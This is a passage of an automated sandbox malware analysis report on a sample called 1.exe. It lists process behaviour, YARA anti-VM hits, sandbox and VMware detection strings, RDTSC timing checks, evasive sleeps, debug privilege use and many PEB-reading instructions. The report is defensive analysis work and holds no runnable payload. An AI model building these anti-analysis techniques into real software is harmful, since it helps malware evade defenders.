Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\1.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002E285E4 second address: 0000000002E285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002E2896E second address: 0000000002E28974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\1.exe TID: 6108 Thread sleep time: -51118s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.exe TID: 1396 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5020 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep count: 140 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep time: -280000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep count: 9832 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6564 Thread sleep time: -19664000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9832 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\1.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 1.8 %
Source: C:\Users\user\Desktop\1.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 51118 Jump to behavior
Source: C:\Users\user\Desktop\1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 0000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.2002563045.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.2005157411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.2003510228.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Enables debug privileges
Source: C:\Users\user\Desktop\1.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\1.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h] 2_2_017F4164
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h] 2_2_017F4164
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B8158 mov eax, dword ptr fs:[00000030h] 2_2_017B8158
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h] 2_2_01726154
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h] 2_2_01726154
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0171C156 mov eax, dword ptr fs:[00000030h] 2_2_0171C156
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov ecx, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_01750124 mov eax, dword ptr fs:[00000030h] 2_2_01750124
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov ecx, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h] 2_2_017CA118
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E0115 mov eax, dword ptr fs:[00000030h] 2_2_017E0115
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h] 2_2_017CE10E
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017501F8 mov eax, dword ptr fs:[00000030h] 2_2_017501F8
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017F61E5 mov eax, dword ptr fs:[00000030h] 2_2_017F61E5
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0179E1D0
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h] 2_2_017E61C3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h] 2_2_017E61C3
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h] 2_2_017A019F
Source: C:\Users\user\Desktop\1.exe Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]